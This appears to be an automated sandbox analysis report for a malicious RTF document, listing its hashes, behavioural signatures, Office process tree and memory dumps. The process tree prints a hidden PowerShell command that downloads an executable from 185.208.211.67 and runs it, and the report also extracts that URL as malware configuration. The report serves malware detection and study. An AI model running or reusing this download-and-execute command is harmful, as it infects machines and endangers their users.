Analysis
-
max time kernel
143s -
max time network
148s -
platform
windows7_x64 -
resource
win7 -
submitted
30-06-2020 04:40
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Resource
win10v200430
General
-
Target
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
-
Size
97KB
-
MD5
340e15c9ee5ae17758bb2e4a7890c0c0
-
SHA1
7bd2df48ad16fe08db23700ab57e781048f9bc76
-
SHA256
894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
-
SHA512
b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6
Malware Config
Extracted
http://185.208.211.67/scorp/Class.sfx.exe
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 740 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEEXCEL.EXEpid process 740 WINWORD.EXE 740 WINWORD.EXE 1048 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1800 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1800 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 740 WINWORD.EXE 740 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1800 1048 powershell.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 1048 wrote to memory of 1800 1048 EXCEL.EXE powershell.exe PID 1048 wrote to memory of 1800 1048 EXCEL.EXE powershell.exe PID 1048 wrote to memory of 1800 1048 EXCEL.EXE powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1800 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
powershell.exepid process 1800 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Program Files\Microsoft Office\Office14\excelcnv.exe"C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/740-5-0x00000000024D0000-0x00000000024D4000-memory.dmpFilesize
16KB
-
memory/740-6-0x0000000007030000-0x0000000007034000-memory.dmpFilesize
16KB
-
memory/1048-1-0x0000000005AD0000-0x0000000005BD0000-memory.dmpFilesize
1024KB
-
memory/1048-0-0x0000000005AD0000-0x0000000005BD0000-memory.dmpFilesize
1024KB
-
memory/1048-3-0x0000000007670000-0x0000000007674000-memory.dmpFilesize
16KB
-
memory/1048-4-0x0000000006670000-0x0000000006674000-memory.dmpFilesize
16KB
-
memory/1800-2-0x0000000000000000-mapping.dmp